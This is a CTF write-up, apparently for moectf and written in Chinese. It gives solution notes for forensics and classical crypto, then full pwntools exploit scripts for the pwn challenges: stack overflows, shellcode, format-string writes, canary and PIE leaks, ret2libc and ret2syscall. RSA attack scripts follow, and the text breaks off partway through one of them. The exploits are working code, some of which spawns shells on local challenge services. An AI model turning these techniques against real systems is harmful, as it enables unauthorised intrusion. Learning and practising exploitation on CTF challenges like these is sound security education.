'72bf10998fb01f8851a13c92aaf4ccbbed81ab83', 'master_replid2': 0, 'master_repl_offset': 0, 'second_repl_offset': -1, 'repl_backlog_active': 0, 'repl_backlog_size': 1048576, 'repl_backlog_first_byte_offset': 0, 'repl_backlog_histlen': 0, 'used_cpu_sys': 6.963199, 'used_cpu_user': 8.13399, 'used_cpu_sys_children': 0.0, 'used_cpu_user_children': 0.0, 'used_cpu_sys_main_thread': 6.965816, 'used_cpu_user_main_thread': 8.12967, 'errorstat_ERR': 'count=2', 'cluster_enabled': 0}

https://blog.csdn.net/guo15890025019/article/details/116994677
未完待续……….(咕咕咕

Forensics

随身携带的虚拟机

vm挂载vmdk,windows10系统
打开后回收站里有key,用key打开锁上的磁盘即可

坚持访问的浏览器


锁定起来的同人文



挂载vc
"L:\data\20230707221115-ibr7vs7\20230707221136-xyfn5al\20230707221147-1rzo2wp\20230707221158-6te2bxl.sy"

base32 解码得到 moectf{S0_d33ply_H1dden!}

classical Crypto

不是“皇帝的新密码”

维吉尼亚密码。根据 flag 格式,用 key moectf{ 解维吉尼亚,得到开头为 goodjo,猜测 key 为 goodjob,解密即可

猫言喵语

喵喵? → -,喵喵喵 → .

ezrot

rot47

可可的新围墙

皇帝的新密码

凯撒7

Ai

EZ MLP


调换即可
moectf{fR13NdsHlP_15_M491C!}

pwn

ret2text_32

from pwn import *

context.log_level = 'debug'

elf = ELF('./pwn')
# Hard-coded address of a string inside the binary (presumably "/bin/sh", going by
# the name) and system's PLT stub; fixed addresses imply a non-PIE build.
str_binsh_addr = 0x804C02C
sys_plt = elf.plt['system']

p = remote('localhost',50227)
p.recvuntil(b'What\'s your age?')
p.sendline(b'200')
p.recvuntil(b'Now..try to overflow!')

# 32-bit frame: 0x58 bytes of buffer plus the 4-byte saved ebp, then the return
# address (system@plt), a 4-byte dummy return address for system, and its argument.
# A stack canary would detect this overwrite before the return executes.
payload = b'a' * (0x58 + 0x4) + p32(sys_plt) + b'a' * 4 + p32(str_binsh_addr)
p.sendline(payload)
p.interactive()

baby_calculator

import pwn
X = pwn.remote("localhost",50677)
# Solver for the service's arithmetic quiz: read the "The first:"/"The second:"
# operands, compare their sum with the value shown after '=', and answer with
# one of two fixed words. `res1`/`res2` are only bound once their prompts
# have been seen, so a '=' line before them would raise NameError.
while 1:
    tmp = X.recvline()
    print(tmp.decode())
    if b'The first:' in tmp:
        x=tmp.decode().index('t')
        res1=tmp.decode()[x+2:]
    if b'The second:'in tmp:
        res2=tmp.decode()[11:]
    if b'=' in tmp:
        val=tmp.decode()[len(res1)+len(res2):]
        if(int(res1.replace('\n',''))+int(res2)==int(val)):
            data1="BlackBird".encode()
            X.sendline(data1)
        else:
            data2="WingS".encode()
            X.sendline(data2)
    if b'Congratulations!You finish' in tmp:
        X.interactive()
    # NOTE(review): this second line is printed but never run through the checks
    # above — the next iteration overwrites `tmp` first. Presumably the service
    # emits lines in pairs; confirm, otherwise every other line is skipped.
    tmp = X.recvline()
    print(tmp.decode())

int_overflow

整形溢出

int 的取值范围 -2147483648~2147483647
-114514 按 32 位无符号解释为 2147483647+1+2147483648-114514
v1=4294852782

fd


fd2=4*1|0x29A=670

ret2text_64

from pwn import *

# NOTE(review): the port 00000 is presumably a redacted placeholder; and `re`
# shadows the stdlib module name pulled in by `from pwn import *`.
re = remote('localhost', 00000)
elf = ELF('./pwn')
# Fixed 0x40xxxx addresses (non-PIE build): a string presumably "/bin/sh", a
# call site for system, and a `pop rdi; ret` gadget. `system_plt` is unused.
binsh = 0x404050
system_plt = elf.symbols['system']
system_plt2 = 0x4012B7
rdi_ret = 0x4011be
# 88 bytes to the saved return address, then the x86-64 chain: rdi = binsh, call system.
payload = b'a' * 88 + p64(rdi_ret) + p64(binsh) + p64(system_plt2)

print(re.recv(4096).decode())
re.sendline('120'.encode())

print(re.recv(4096).decode())
re.sendline(payload)
re.interactive()

shellcode_level0


网上找到shellcode

from pwn import *

p = remote('localhost',34897)
# Ready-made shell-spawning stub (found online, per the writeup) sent as the
# program's input; the target runs whatever it receives, which only works while
# the input buffer is executable — NX/W^X memory stops this whole class.
shellcode='\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05'
p.sendline(shellcode)
p.interactive()

uninitialized_key

# coding=utf-8
from pwn import *


context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 42085)
#p = process('./uninitialized_key')

p.sendline("114514")
# NOTE(review): gdb.attach() targets a local process; against remote() it is
# ineffective — presumably left over from local debugging.
gdb.attach(p)
# The "key" is never initialised by the program, so an empty/NUL second answer matches it.
p.sendline("\x00")# or simply leave it empty: p.sendline("")

p.interactive()

format_level0

# coding=utf-8
from pwn import *

flag = ""
# Read stack slots 7..16 through positional "%N$p" format-string leaks, one
# fresh connection per slot, and reassemble the little-endian words as text.
# The root cause is a user-controlled format string; passing the input as a
# printf argument ("%s") removes it.
for i in range(7,17):
    p = remote('localhost', 32809)
    # p = process('./format_level0')

    # gdb.attach(p)
    p.sendline(f"%{i}$p")
    p.recvuntil("0x")

    # NOTE(review): `binascii` is not imported in this file; it is assumed to
    # arrive through `from pwn import *` — confirm.
    byte_str = binascii.unhexlify(p.recvline()[:-1])
    str_result = byte_str.decode("utf-8")
    flag+=str_result[::-1]

    p.close()

print(flag)

PIE_enabled

# coding=utf-8
from pwn import *

context.arch = "amd64"
p = remote('localhost', 45993)
#p = process('./pwn')

# The program prints one code address; subtracting its offset inside the image
# gives the PIE base, and the remaining image offsets are rebased from it.
# Leaking any image pointer is what defeats PIE here.
p.recvuntil("0x")
leak = int(p.recvline()[:-1], 16)
base_add = leak - 0x1245
system_add = base_add + 0x10A0
bash = base_add + 0x4010
pop_rdi = base_add + 0x0000000000001323
ret = base_add + 0x128D
success(hex(base_add))

# gdb.attach(p)
# 0x58 bytes to the return address; the extra `ret` presumably keeps the stack
# aligned before the call. (`paylaod` is a typo, used consistently.)
paylaod = b'a' * 0x58 + p64(pop_rdi) + p64(bash) + p64(ret) + p64(system_add)
p.sendline(paylaod)

p.interactive()

shellcode_level1

# coding=utf-8
from pwn import *

context.arch = "amd64"
# p = remote('localhost', 54369)
p = process('./shellcode_level1')
# gdb.attach(p)
# First input is "4" (presumably a menu choice), then a pwntools-generated
# shell stub is sent as the next input.
p.sendline("4")
payload = asm(shellcraft.sh())

p.sendline(payload)

p.interactive()

Uninitialized_key_plus

# coding=utf-8
from pwn import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 33067)
# p = process('./uninitialized_key_plus')

# 20 bytes of filler followed by the 32-bit value 0x1BF52 — presumably the
# value the program's uninitialised key variable is compared against — then
# a NUL second line.
payload = b"a"*20 + p32(0x1BF52)
p.sendline(payload)
p.sendline(b"\x00")

p.interactive()

format_level1

# coding=utf-8
from pwn import *

from ctypes import *

context.log_level = "debug"
# context.arch = "amd64"
p = remote('localhost',33853)
# p = process('./format_level1')

p.sendline("3")
# "%8$n" stores the number of bytes printed so far (0 here) through the pointer
# found at positional argument 8 — the address appended to the payload itself.
# NOTE(review): 0x804c00c is a 32-bit address packed with p64; presumably the
# upper zero bytes are harmless here, confirm against the binary.
payload = b"%8$n" + p64(0x804c00c)
p.sendline(payload)
# gdb.attach(p)
p.sendline(b"1")

p.interactive()

rePWNse

# coding=utf-8
from pwn import *

from ctypes import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 35899)
# p = process('./rePWNse')


pop_rdi = 0x000000000040168e

# Seven answers sent in order; the trailing numbers are presumably the prompt
# indices the author matched while reversing the binary.
p.sendline("1") #7
p.sendline("9") #8
p.sendline("1") #9
p.sendline("9") #10
p.sendline("8") #11
p.sendline("1") #12
p.sendline("0") #13

p.recvuntil("address is:")
leak = int(p.recvline()[2:-1],16)
# gdb.attach(p)
# 0x48 bytes to the return address; the leaked address becomes rdi for the call at 0x401296.
payload = b'a'*0x48+p64(pop_rdi)+p64(leak)+p64(0x401296)
p.sendline(payload)

p.interactive()

changeable_shellcode

# coding=utf-8
from pwn import *

from ctypes import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost',34369)
# p = process('./shellcode')


# Hand-written stub assembled by pwntools. Its first instruction rewrites one
# byte of the buffer (offset 33) at run time, and the single 0x0f byte appended
# below completes the sequence — the buffer is both data and code, which is
# exactly what non-executable input memory is meant to rule out.
shellcode = '''
mov byte ptr[rax+33], 5
push 0
mov rax, 0x68732f2f6e69622f
push rax
push rsp
pop rdi
xor rsi, rsi
xor rdx, rdx
mov rax, 59
'''
p.sendline(asm(shellcode)+b'\x0f')

p.interactive()

format_level2

# coding=utf-8
from pwn import *

from ctypes import *

# context.log_level = "debug"
# context.arch = "amd64"
p = remote('localhost',40621)
# p = process('./format_level2')

# Leak a stack pointer with "%p", derive the slot 64 bytes above it, then use
# two "%N$hhn" single-byte writes to change it (the second one at +1). The
# "3"/"4" inputs between steps are presumably menu choices.
p.sendlineafter(":",b"3")
p.sendlineafter(":",b"%p")

p.recvuntil("0x")
stack = int(p.recvline()[:-1], 16)
func_ret = stack + 64
p.sendline(b"3")
payload = b"%23p%10$hhn".ljust(12, b'a') + p32(func_ret)
p.send(payload)
p.sendlineafter(":",b"3")
payload = b"%147p%10$hhn".ljust(12, b'a') + p32(func_ret+1)
p.sendlineafter(":",payload)
p.sendlineafter(":",b"4")

p.interactive()

feedback

# coding=utf-8
from pwn import *

from ctypes import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 42147)
# p = process('./feedback')

# The program accepts negative list indices (-8, -11), so writes land outside
# the intended array — an unchecked-index bug; a bounds check on the index is the fix.
# First write: the constant 0xFBAD1800 followed by zeros, after which the program's
# output contains a pointer; subtracting 0x1ec980 treats it as a libc address
# (offset specific to the challenge's libc build).
p.sendlineafter("Which list do you want to write?",b"-8")
payload = p64(0xFBAD1800) + p64(0)*3 + b'\x00'
p.sendlineafter(".\n",payload)

p.recvuntil(b'\x00'*8)
libc_base = u64(p.recv(8)) - 0x1ec980
success(hex(libc_base))
flag = libc_base + 0x1f1700

# Second and third writes go to index -11: one byte, then the computed address.
p.sendlineafter("?",b"-11")
p.sendlineafter(".",b'\x68')
p.sendlineafter("?",b"-11")
p.sendlineafter(".",p64(flag))

p.interactive()

format_level3

# coding=utf-8
from pwn import *

from ctypes import *

# context.log_level = "debug"
# context.arch = "amd64"
p = remote('localhost',42835)
# p = process('./format_level3')

# Leak a stack address via "%6$p", take the slot 4 bytes above it, then write it
# in two steps: a one-byte "%hhn" and a two-byte "%hn" (0x9317). The "3"/"4"
# inputs are presumably menu choices. Same root cause as the other format
# levels: user input used as the format argument.
p.sendlineafter(":",b"3")
p.sendlineafter(":",b"%6$p")
p.recvuntil("0x")
stack = int(p.recvline()[:-1], 16)
func_ret = stack + 4

p.sendlineafter(":",b"3")
payload = "%{}p%6$hhn".format(func_ret & 0xff)
p.sendlineafter(":",payload.encode())
p.sendlineafter(":",b"3")
payload = "%{}p%14$hn".format(0x9317)
p.sendlineafter(":",payload.encode())
p.sendlineafter(":",b"4")
p.interactive()

ret2libc

from pwn import *
from LibcSearcher import*
context.arch = "amd64"
p = remote('localhost', 38193)
#p = process('./pwn(1)')
elf = ELF("./pwn")
#libc = ELF("./libc6_2.7-10ubuntu3_amd64.so")

pop_rdi = 0x000000000040117e
main = 0x4011E8

# Stage 1: overflow (0x50 buffer + 8 saved rbp) into a chain that prints the
# GOT entry of puts through puts@plt, then returns to main for a second input.
p1 = b"a" * (0x50 + 0x8)
p1 += p64(pop_rdi) + p64(elf.got['puts'])
p1 += p64(elf.plt['puts'])
p1 += p64(main)
p.sendline(p1)

# The leaked pointer is the 6 bytes ending at the 0x7f high byte, zero-extended to 8.
puts_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
success("puts:%s",hex(puts_addr))

# LibcSearcher (third-party) matches the leaked puts address against known libc
# builds to supply system and a "/bin/sh" string offset.
# NOTE(review): such matches can be ambiguous; a local copy of the target libc is more reliable.
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_addr = libc_base + libc.dump('str_bin_sh')

# Stage 2: same overflow, now calling system("/bin/sh"); the 0x40122A entry
# presumably is a lone `ret` for stack alignment. `one` (one_gadget candidates) is unused.
p2 = b"a" * (0x50 + 0x8)
one = [0x50a37, 0xebcf1, 0xebcf5, 0xebcf8]
# p2 += p64(libc_base + one[3])
p2 += p64(pop_rdi) + p64(bin_addr) + p64(0x40122A)
p2 += p64(system_addr)
p.sendline(p2)
p.interactive()

ret2syscall

# coding=utf-8
from pwn import *

context.arch = "amd64"
p = remote('localhost', 40953)
# p = process('./ret2syscall')
elf = ELF("./ret2syscall")
libc = ELF("./libc6_2.35-0ubuntu3_amd64.so")  # loaded but unused below

# Gadget and data addresses are fixed (non-PIE build); `bss` and `ret` are unused.
pop_rax = 0x000000000040117e
pop_rdi = 0x0000000000401180
pop_rsi_rdx = 0x0000000000401182
bss = 0x0000000000404060
ret = 0x00000000004011C1
syscall_addr = 0x401185
binsh_addr = 0x0000000000404040

# Register setup for the execve syscall (rax=59) via a `syscall` gadget, so no
# libc address is needed; a stack canary or seccomp filter would stop this.
payload = b"a" * 0x48
payload += p64(pop_rdi) + p64(binsh_addr) # stackoverflow & rdi=binsh_addr
payload += p64(pop_rsi_rdx) + p64(0) + p64(0) # rsi=0 rdx=0
payload += p64(pop_rax) + p64(59) # rax=59
payload += p64(syscall_addr) # execve("/bin/sh",0,0)
p.sendline(payload)
p.interactive()

shellcode_level2

from pwn import *

context.arch = "amd64"
p = remote('localhost', 41523)
# p = process('./shellcode_level2')
elf = ELF("./shellcode_level2")  # loaded but unused below
libc = ELF("./libc6_2.35-0ubuntu3_amd64.so")  # loaded but unused below

# A leading NUL byte (presumably to satisfy a check on the first byte) followed
# by a pwntools-generated shell stub.
payload = b'\x00'+asm(shellcraft.sh())
# gdb.attach(p)
p.sendline(payload)
p.interactive()

little_canary

# coding=utf-8
from pwn import *
from LibcSearcher import *
from ctypes import *

# context.log_level = "debug"
# context.arch = "amd64"
p = remote('localhost', 40905)
# p = process('./little_canary')
# NOTE(review): the commented-out process() line targets ./little_canary but
# the ELF is loaded from ./pwn. elf.got/elf.plt below come from whatever ./pwn
# is -- confirm the two are the same binary.
elf = ELF("./pwn")
# libc = ELF("./libc-2.32-1.fc33.x86_64.so")

main = 0x4012BA                  # returned to after the leak so the overflow can be reused
pop_rdi = 0x0000000000401343     # pop rdi; ret gadget inside the binary

# Stage 1 -- leak the canary. 72 bytes of 'a' run up to the canary and clobber
# its low byte, which is always 0x00; the program's echo therefore no longer
# stops there and spills the canary's remaining 7 bytes.
p.sendlineafter(b"name?\n",b"a"*72)
p.recvuntil(b"\n")
# Restore the 0x00 low byte in front of the 7 leaked bytes.
canary = u64(b"\x00"+p.recv(7))
# gdb.attach(p)
success(hex(canary))
print(hex(elf.got['puts']))
# Stage 2 -- overflow again with the correct canary in place. The p64(0)
# fills the 8-byte slot between the canary and the return address
# (presumably saved rbp), then puts(got['puts']) leaks a libc address and
# the chain returns to main for a second round.
payload = b'a'*72+p64(canary)+p64(0)
payload += p64(pop_rdi) + p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(main)
p.sendline(payload)

# Two reads: the first 0x7f-terminated chunk is thrown away and only the
# second is taken as the puts address. Which earlier output the first read
# swallows is not visible here -- check with log_level = "debug" before reusing.
leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
# The remote libc is unknown, so the puts offset is used to look one up.
libc = LibcSearcher('puts',leak)
libc_base = leak - libc.dump('puts')
success(hex(libc_base))

# main presumably asks for the name again; answer with a throwaway value.
p.sendline(b"payload")

# Stage 3 -- same layout, this time calling system("/bin/sh"). The extra
# 0x4012DC sits between pop_rdi's argument and system, so it runs first;
# presumably a bare `ret` used to keep the stack 16-byte aligned for system.
payload = b'a'*72+p64(canary)+p64(0)
payload += p64(pop_rdi) + p64(libc_base + libc.dump("str_bin_sh"))+p64(0x4012DC)
payload += p64(libc_base + libc.dump('system'))
p.sendline(payload)

p.interactive()

shellcode_level3

# coding=utf-8
from pwn import *
from LibcSearcher import *
from ctypes import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 34733)
elf = ELF("./shellcode_level3")
libc = ELF("./libc6_2.35-0ubuntu3_amd64.so")

# Only five bytes are sent. E9 is `jmp rel32`; the little-endian displacement
# 0xFFFFD148 is -0x2EB8 (-11960 bytes), counted from the end of this
# instruction. What lives at the destination (presumably a buffer that already
# holds usable code) is not visible in this script -- verify against the
# binary before reusing.
jump_back = bytes.fromhex("e9 48 d1 ff ff")
p.sendline(jump_back)
p.interactive()

crypto

baby_e

import libnum
import gmpy2

n = 553409369582823237678532685244026647155180191225879439432235077135813123637186465008813830373646133388592395760175777499266561095087891764348044063111935877931069321764391883899483374576303169645488542398590564148654412004383012178107972880058460460806768779452529433458826925606225797078653905380530651390617109384086518728626571028089036812787671647095695947167204428442727185744172445701874820612799168887428075695751162763647868386879374037826876671079326544820609721731078985096813307183878793033824330869698508952853770794414757655681370862323768018291030331209143189638496644361618184164228294031490537429556439588954274708598530042700988138862000054458742762198052079867259365645914383561162796796952346445529346145323567650621600171442575319262718389389870407629339714751583360252884338116164466349449862781112019462555743429653595045695696967783338371470032332852204294900011651434678829104876529439166176589508898757122660322523937330848536715937381297551894198974459004139082562228022412335520195652419375915216074658463954339332593244483927157329404652516225481116614815221154229491846087288087715884363786672244655901308480290011237244562251084095684531716327141154558809471185132979704992609461470501119328696999713829
e = 7
c = 147693154873835354725007152781732424355869776162377337823960431913672366269917723916891506269449726723757821517328874729037838600793748824028829185409932536014732765063216715033843955453706710187792772702199448156372644163429786386035008302836467605094954587157232829525150652611067567669525072625329634860065850520051628272535479197120008981979404760445193750864902244921407742155742716289495581989134730376783828846663464819337418977287363028738701414486788851136608957124505485242331701209645216580641917007780811842757125048746184068597664780265422321550909392419865169775282217442331295071069272774722564587602419768461231775480847018941840911357926330143045826277813722919121117172763493242590521245640828462665947672485094793188432098216701511715232654611338293295459889814699850788048985878279440740712956248569068077253790198036918598519191892836075254345518967666166925163908185663991353344555402397055977817370082929420443034626201745027965444069777059760865359310439815816749939498993014457995041394803598825093836045546578310632172636478575946653375857640993393714607308326474003446154152048840071034349831168612740218034679021240949747357214453636633636662650940968576792518622437627529244515229173

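def _integer_root(x, k):
    """Return (r, exact) with r = floor(x ** (1/k)) and exact = (r ** k == x).

    Pure-integer Newton iteration, so it is exact for arbitrarily large x
    (no float conversion, unlike a naive x ** (1/k)).

    Raises:
        ValueError: if x < 0 or k < 1.
    """
    if x < 0 or k < 1:
        raise ValueError("need x >= 0 and k >= 1")
    if x < 2:
        return x, True
    # Start from a power of two that is >= the true root, then descend; the
    # iteration stops at the first step that no longer decreases r.
    r = 1 << ((x.bit_length() + k - 1) // k)
    while True:
        y = ((k - 1) * r + x // (r ** (k - 1))) // k
        if y >= r:
            break
        r = y
    return r, r ** k == x


def exp(n, e, c, max_k=None):
    """Small-public-exponent attack: recover m from c = m**e mod n.

    With a tiny e and an unpadded m, m**e is only a little larger than n, so
    m**e = k*n + c for some small non-negative k. Walk k upwards until
    k*n + c is a perfect e-th power; that root is m.

    Args:
        n: RSA modulus.
        e: public exponent (small, e.g. 3 or 7).
        c: ciphertext.
        max_k: optional upper bound for k. None (the default, and the original
            behaviour) searches indefinitely -- which never terminates when
            the message was padded or is large enough that m**e >> n.

    Returns:
        The plaintext as big-endian bytes (also printed, as before), or None
        when max_k is exhausted without finding a root.
    """
    k = 0
    while max_k is None or k <= max_k:
        m, exact = _integer_root(k * n + c, e)
        if exact:
            m = int(m)
            # Same encoding as libnum.n2s: big-endian, at least one byte.
            plaintext = m.to_bytes(max(1, (m.bit_length() + 7) // 8), "big")
            print(plaintext)
            return plaintext
        k += 1
    return None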
# Unbounded search: this never returns if no k makes k*n + c a perfect
# e-th power (padded or large plaintext). Pass max_k to cap the attempt.
exp(n, e, c)

bad_E

from gmpy2 import *
from Crypto.Util.number import *

# "bad_E": the script below never inverts e modulo phi(n); it prints
# GCD(e, q-1) as a diagnostic and then inverts e modulo p-1 only, i.e. e is
# not coprime to phi(n) and the decryption is done in the subgroup mod p.
e = 65537
p = 11727544912613560398705401423145382428897876620077115390278679983274961030035884083100580422155496261311510530671232666801444557695190734596546855494472819
q = 6853495238262155391975011057929314523706159020478084061020122347902601182448091015650787022962180599741651597328364289413042032923330906135304995252477571
c = 63388263723813143290256836284084914544524440253054612802424934400854921660916379284754467427040180660945667733359330988361620691457570947823206385692232584893511398038141442606303536260023122774682805630913037113541880875125504376791939861734613177272270414287306054553288162010873808058776206524782351475805
n = p*q

# phi_n is computed but never used: the normal d = e^-1 mod phi does not exist
# here, hence the detour below. The printed GCD is the diagnostic.
phi_n = (p-1)*(q-1)
print(GCD(e,q-1))
# Invert modulo p-1 only; this requires gcd(e, p-1) == 1 (invert raises
# otherwise). NOTE(review): pow(c, d, p) recovers m mod p, which equals m only
# if the plaintext integer is smaller than p -- presumably true for this flag;
# a longer message would also need the q side (or a root-finding step).
# NOTE(review): `gmpy2.invert` resolves only because `from gmpy2 import *`
# appears to bind the package's C submodule under the name gmpy2; the plain
# `invert(e, p-1)` from the star import is the robust spelling.
d = gmpy2.invert(e,(p-1))
m = pow(c,d,p)
print(long_to_bytes(m))

n&n

import libnum
import gmpy2

n= 13612969130810965900902742090064423006385890357159609755971027204203418808937093492927060428980020085273603754747223030702684866992231913349067578014240319426522039068836171388168087260774376277346092066880984406890296520951318296354893551565670293486797637522297989653182109744864444697818991039473180752980752117041574628063002176339235126861152739066489620021077091941250365101779354009854706729448088217051728432010328667839532327286559570597994183126402340332924370812383312664419874352306052467284992411543921858024469098268800500500651896608097346389396273293747664441553194179933758992070398387066135330851531
e1= 0x114514
e2= 19198101
c1= 5776799746376051463605370130675046329799612910435315968508603116759552095183027263116443417343895252766060748671845650457077393391989018107887540639775168897954484319381180406512474784571389477212123123540984850033695748142755414954158933345476509573211496722528388574841686164433315356667366007165419697987147258498693175698918104120849579763098045116744389310549687579302444264316133642674648294049526615350011916160649448726069001139749604430982881450187865197137222762758538645387391379108182515717949428258503254717940765994927802512049427407583200118969062778415073135339774546277230281966880715506688898978925
c2= 4664955020023583143415931782261983177552050757537222070347847639906354901601382630034645762990079537901659753823666851165175187728532569040809797389706253282757017586285211791297567893874606446000074515260509831946210526182765808878824360460569061258723122198792244018463880052389205906620425625708718545628429086424549277715280217165880900037900983008637302744555649467104208348070638137050458275362152816916837534704113775562356277110844168173111385779258263874552283927767924979691542028126412133709129601685315027689094437957165812994784648540588277901241854031439324974562449032290219652206466731675967045633360

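def _extended_gcd(a, b):
    """Return (g, x, y) with g = gcd(a, b) and a*x + b*y == g (iterative)."""
    x0, x1, y0, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def _mod_pow_signed(base, exponent, modulus):
    """pow(base, exponent, modulus) that also accepts a negative exponent.

    A negative exponent means "invert base mod modulus first"; the inverse
    must exist.

    Raises:
        ValueError: if base is not invertible modulo modulus.
    """
    if exponent >= 0:
        return pow(base, exponent, modulus)
    g, inv, _ = _extended_gcd(base % modulus, modulus)
    if g != 1:
        raise ValueError("ciphertext is not invertible modulo n")
    return pow(inv % modulus, -exponent, modulus)


def exp_def(e1, e2, c1, c2, n):
    """Common-modulus attack.

    c1 and c2 encrypt the same m under the same n with coprime exponents.
    Bezout gives s1*e1 + s2*e2 == 1, so
    c1**s1 * c2**s2 == m**(s1*e1 + s2*e2) == m (mod n).
    One of s1, s2 is negative, which is why a modular inverse is needed;
    the original relied on pow() accepting a negative exponent (Python 3.8+),
    here it is done explicitly.

    Args:
        e1, e2: the two public exponents (must be coprime).
        c1, c2: ciphertexts of the same plaintext under (n, e1) and (n, e2).
        n: the shared modulus.

    Returns:
        The recovered plaintext as an int.

    Raises:
        ValueError: if gcd(e1, e2) != 1 (the attack does not apply) or a
            ciphertext is not invertible mod n.
    """
    g, s1, s2 = _extended_gcd(e1, e2)
    if g != 1:
        raise ValueError("e1 and e2 must be coprime for the common-modulus attack")
    m = (_mod_pow_signed(c1, s1, n) * _mod_pow_signed(c2, s2, n)) % n
    return int(m)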

# The challenge hands out two ciphertexts under one n with different e; the
# attack assumes both encrypt the same m and needs only Bezout coefficients
# of (e1, e2) -- no private key, no factoring.
m=exp_def(e1,e2,c1,c2,n)
print(libnum.n2s(m))

factor_signin

factordb

p1 = 18055722101348711626577381571859114850735298658417345663254295930584841136416234624852520581982069555948490061840244710773146585295336094872892685938420880462305333393436098181186277450475949236132458958671804132443554885896037342335902958516394876382378829317303693655605215373555988755516058130500801822723195474873517960624159417903134580987202400855946137101429970119186394052011747475879598126195607938106163892658285305921071673588966184054026228745012993740035399652049777986535759039077634555909031397541116025395236871778797949216479130412500655359057128438928721459688727543057760739527720641179290282309741
q1 = 19024691283015651666032297670418553586155390575928421823630922553034857624430114628839720683172187406577114034710093054198921843669645736474448836706112221787749688565566635453151716934583685087745112614898780150391513798368931496744574075511968933800467288441832780919514199410584786925010518564670786685241724643282580795568609339268652910564215887176803735675069372979560024792322029911970574914829712553975379661212645059271137916107885326625543090473004683836665262304916304580076748336858662108554591235698235221618061328251985929904075811056422186525179189846420226944944513865790999242309352900287977666792901
n1 = 343504538870081878757729748260620800783581983635281373321527119223374418103340873199654926888439040391545101913132680017655039577253974802351999985470115474655124168592386965001556620077117966153475518658881140827499124290142523464795351995478153288872749817655925271395693435582010998996210909883510311066017237567799370371513462802547313382594409676803895262837061350017911885033133654781876923251129406855067993830824618637981136966134029212516871210627954762147349788788999116702635535406398258621926040887099782494271000823401788337120154104692934583729065189687995570122890809807661370008740283447636580308161498808092269041815719148127168137018600113465985504975054319601741498799761500526467431533990903047624407330243357514588557352746347337683868781554819821575385685459666842162355673947984514687068626166144076257334426612302554448774082488600083569900006274897032242821388126274957846236552373226099112200392102883351088570736254707966329366625911183721875374731791052229266503696334310835323523568132399330263642353927504971311717117370721838701629885670598853025212521537158141447625623337563164790788106598854822686494249848796441153496412236527242235888308435573209980270776407776277489669763803746640746378181948641
e = 65537
c1 = 10004937130983861141937782436252502991050957330184611684406783226971057978666503675149401388381995491152372622456604317681236160071166819028679754762162125904637599991943368450200313304999566592294442696755822585022667008378021280392976010576970877334159755332946926433635584313137140987588847077645814987268595739733550220882135750267567373532603503399428451548677091911410732474324157868011686641243202218731844256789044721309478991918322850448456919991540932206923861653518190974620161055008847475600980152660468279765607319838003177639654115075183493029803981527882155542925959658123816315099271123470754815045214896642428657264709805029840253303446203030294879166242867850331945166255924821406218090304893024711068773287842075208409312312188560675094244318565148284432361706108491327014254387317744284876018328591380705408407853404828189643214087638328376675071962141118973835178054884474523241911240926274907256651801384433652425740230755811160476356172444327762497910600719286629420662696949923799255603628210458906831175806791599965316549386396788014703044837917283461862338269599464440202019922379625071512100821922879623930069349084917919100015782270736808388388006084027673781004085620817521378823838335749279055639005125
import gmpy2
from Crypto.Util.number import *
# n1: both primes are given (presumably looked up on factordb, per the
# heading), so this half is textbook decryption.
d1 = gmpy2.invert(e,(p1-1)*(q1-1))
m1=pow(c1,d1,n1)

c2 = 4948422459907576438725352912593232312182623872749480015295307088166392790756090961680588458629287353136729331282506869598853654959933189916541367579979613191505226006688017103736659670745715837820780269669982614187726024837483992949073998289744910800139692315475427811724840888983757813069849711652177078415791290894737059610056340691753379065563574279210755232749774749757141836708161854072798697882671844015773796030086898649043727563289757423417931359190238689436180953442515869613672008678717039516723747808793079592658069533269662834322438864456440701995249381880745586708718334052938634931936240736457181295
n2 = 8582505375542551134698364096640878629785534004976071646505285128223700755811329156276289439920192196962008222418309136528180402357612976316670896973298407081310073283979903409463559102445223030866575563539261326076167685019121804961393115251287057504682389257841337573435085535013992761172452417731887700665115563173984357419855481847035192853387338980937451843809282267888616833734087813693242841580644645315837196205981207827105545437201799441352173638172133698491126291396194764373021523547130703629001683366722885529834956411976212381935354905525700646776572036418453784898084635925476199878640087165680193737

n2b=[9949603102225364603,10049235158029375571,10547615587767500213,10596280721192026229,10864078180916418691,11092420583960163379,11853704782834170959,12034779627328165471,12404642343676224637,12448177342966243757,13062839684118954553,13645878578452317313,14397830993057803133,14619040595108594017,14678737767649343977,14745811312384518031,14813953870710226847,15175734709842430433,15211380502610462057,15332916111580607077,15751974537676958401,16123604149048919099,16408421615173973083,16870346804576162551,17093292308638969889,17265001711647542137,17289161209347211817,17543713628803023199,17673334943789572513,18106525049998616747,18345408081492711641,18390046459144888243]
# n2 is built from the 32 roughly 64-bit primes listed in n2b, so
# phi(n2) = prod(p_i - 1) -- valid only if n2b is exactly the set of distinct
# prime factors. NOTE(review): worth asserting that the product of n2b equals
# n2 before trusting phi2; a missing or repeated factor yields a wrong d2 and
# pow() will still "succeed" with garbage.
phi2= 1
for i in n2b:
    phi2 *= (i-1)
d2=gmpy2.invert(e,phi2)
m2=pow(c2,d2,n2)
print(long_to_bytes(m1)+long_to_bytes(m2))

|p-q|

import gmpy2
from Crypto.Util.number import *
e=65537
